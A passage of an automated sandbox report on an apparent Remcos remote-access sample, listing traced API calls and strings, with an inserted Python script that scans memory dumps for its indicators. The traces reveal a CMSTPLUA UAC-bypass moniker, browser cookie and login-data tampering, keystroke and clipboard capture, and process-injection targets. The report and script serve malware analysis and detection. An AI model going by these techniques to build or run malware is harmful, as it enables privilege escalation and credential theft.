• GlobalLock.KERNEL32(00000000), ref: 004169B0
• GlobalUnlock.KERNEL32(00000000), ref: 004169B9
• CloseClipboard.USER32 ref: 004169BF
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
• String ID: !D@
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,8)3,?,P2), ref: 0040F4C9
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
• CloseHandle.KERNEL32(00000000), ref: 0040F59E
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• CloseHandle.KERNEL32(00000000), ref: 0040F6A9
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
• String ID: 8)3$C:\Program Files(x86)\Internet Explorer\$Inj$P2$ieinstal.exe$ielowutil.exe
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
• FindClose.KERNEL32(00000000), ref: 0040BE04
• FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
• FindClose.KERNEL32(00000000), ref: 0040BEEA
• FindClose.KERNEL32(00000000), ref: 0040BF0B
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$Close$File$FirstNext
                                                                                                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                  • API String ID: 3527384056-432212279
                                                                                                                                  • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                  • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                                                                  • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                  • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                                                                  APIs
                                                                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 297527592-0
                                                                                                                                  • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                                                                  • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                                                                  • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                                                                  • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                                                                  • API String ID: 0-1861860590
                                                                                                                                  • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                                                                  • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                                                                                  • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                                                                  • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                                                                  APIs
                                                                                                                                  • _wcslen.LIBCMT ref: 0040755C
                                                                                                                                  • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object_wcslen
                                                                                                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                  • API String ID: 240030777-3166923314
                                                                                                                                  • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                                  • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                                                                  • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                                  • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A84C
                                                                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3587775597-0
                                                                                                                                  • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                                  • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                                                                  • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                                  • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                  • String ID: JD$JD$JD
                                                                                                                                  • API String ID: 745075371-3517165026
                                                                                                                                  • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                  • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                                                                  • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                  • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                  • API String ID: 1164774033-405221262
                                                                                                                                  • Opcode ID: fddf014dc9d51464ede12c116fb1a9a1db5591685b143fb650fb6654b978e18b
                                                                                                                                  • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                                                                  • Opcode Fuzzy Hash: fddf014dc9d51464ede12c116fb1a9a1db5591685b143fb650fb6654b978e18b
                                                                                                                                  • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
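The String ID fields above carry the indicators an analyst actually reuses from this report: the CMSTPLUA elevation moniker and CLSID passed to CoGetObject, the Firefox profile path and cookies.sqlite strings walked with FindFirstFileA/W, and the ieinstal.exe / ielowutil.exe injection hosts located through the Toolhelp32 snapshot. The script below is an added triage example, not code from the Joe Sandbox report or from the Remcos sample; the indicator strings are copied from the report's String ID entries, the sample buffer is constructed for illustration and stands in for the 0x400000 RegAsm dump, and the function names are my own. Because the sample mixes A and W API variants (FindFirstFileA with an ASCII path, FindFirstFileW and CoGetObject with wide strings), every indicator is searched in both ASCII and UTF-16LE; a plain ASCII grep over the dump would miss the moniker entirely.

```python
"""Static triage of a memory dump for the Remcos indicators listed in this report.

Added example. Indicator strings are taken from the report's String ID fields;
the buffer returned by build_sample() is constructed and is not real sample data.
"""
from typing import Dict, List, Tuple

# Indicator strings exactly as they appear in the report's String ID entries.
INDICATORS: Dict[str, List[str]] = {
    # CoGetObject on the elevation moniker for the CMSTPLUA COM object (UAC bypass).
    "uac_bypass_cmstplua": [
        "Elevation:Administrator!new:",
        "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",
        "ucmAllocateElevatedObject",
    ],
    # FindFirstFile*/FindNextFile* walk of the Firefox profile tree for cookies.sqlite.
    "firefox_cookie_tamper": [
        "\\Mozilla\\Firefox\\Profiles\\",
        "\\cookies.sqlite",
        "[Firefox cookies found, cleared!]",
    ],
    # Process names compared against the Toolhelp32 snapshot before injection.
    "injection_hosts": ["ieinstal.exe", "ielowutil.exe"],
}

# The sample uses both -A and -W APIs, so each needle is tried in both encodings.
ENCODINGS: Tuple[Tuple[str, str], ...] = (("ascii", "latin-1"), ("utf-16le", "utf-16-le"))


def scan(buf: bytes) -> Dict[str, List[Tuple[str, str]]]:
    """Return {category: [(indicator, encoding), ...]} for every indicator found in buf."""
    hits: Dict[str, List[Tuple[str, str]]] = {}
    for category, needles in INDICATORS.items():
        for needle in needles:
            for label, codec in ENCODINGS:
                if needle.encode(codec) in buf:
                    hits.setdefault(category, []).append((needle, label))
    return hits


def verdict(hits: Dict[str, List[Tuple[str, str]]]) -> str:
    """Moniker prefix and CMSTPLUA CLSID together are the high-confidence signal;
    anything else from the table is reported at medium confidence."""
    uac = {needle for needle, _ in hits.get("uac_bypass_cmstplua", [])}
    if {"Elevation:Administrator!new:", "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"} <= uac:
        return "high: CMSTPLUA UAC bypass moniker present"
    if hits:
        return "medium: " + ", ".join(sorted(hits))
    return "clean"


def build_sample() -> bytes:
    """Constructed stand-in for a process dump: wide moniker, ASCII Firefox strings,
    wide injection-host name, padded with NULs. Not bytes from the real sample."""
    return (
        b"\x00" * 16
        + "Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}".encode("utf-16-le")
        + b"\x00" * 8
        + b"\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\x00"
        + b"[Firefox cookies found, cleared!]\x00"
        + "ieinstal.exe".encode("utf-16-le")
        + b"\x00" * 16
    )


if __name__ == "__main__":
    found = scan(build_sample())
    for category, entries in found.items():
        for needle, encoding in entries:
            print(f"{category:24s} {encoding:8s} {needle}")
    print(verdict(found))
```

Run it against a real dump with `scan(open(path, "rb").read())`; on the constructed buffer it reports the moniker and CLSID as UTF-16LE hits, the two Firefox strings as ASCII hits, ieinstal.exe as a UTF-16LE hit, and a high-confidence verdict. The encoding label on each hit is worth keeping in a triage note, since it tells you which API family (A or W) the string was built for.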
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2341273852-0
                                                                                                                                  • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                  • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                                                                  • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                  • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Find$CreateFirstNext
                                                                                                                                  • String ID: 8)3$PXG$PXG$P2$NG
                                                                                                                                  • API String ID: 341183262-3848105806
                                                                                                                                  • Opcode ID: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                                                                                                  • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                                                                  • Opcode Fuzzy Hash: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                                                                                                  • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1888522110-0
                                                                                                                                  • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                                  • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                                                                  • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                                  • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                  • API String ID: 2127411465-314212984
                                                                                                                                  • Opcode ID: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                                                                                                  • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                                                                  • Opcode Fuzzy Hash: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                                                                                                  • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 00449292
                                                                                                                                  • _free.LIBCMT ref: 004492B6
                                                                                                                                  • _free.LIBCMT ref: 0044943D
                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                                  • _free.LIBCMT ref: 00449609
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 314583886-0
                                                                                                                                  • Opcode ID: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                                                                                  • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                                                                                  • Opcode Fuzzy Hash: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                                                                                  • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                    • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                    • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                    • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                    • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                                                                  • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                  • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                                                  • API String ID: 1589313981-2876530381
                                                                                                                                  • Opcode ID: f36725adc453bcf5032fda081e8724ac621dd34e58e17af2814313182f1d6942
                                                                                                                                  • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                                                                  • Opcode Fuzzy Hash: f36725adc453bcf5032fda081e8724ac621dd34e58e17af2814313182f1d6942
                                                                                                                                  • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                                                                  • GetLastError.KERNEL32 ref: 0040BA93
                                                                                                                                  Strings
                                                                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
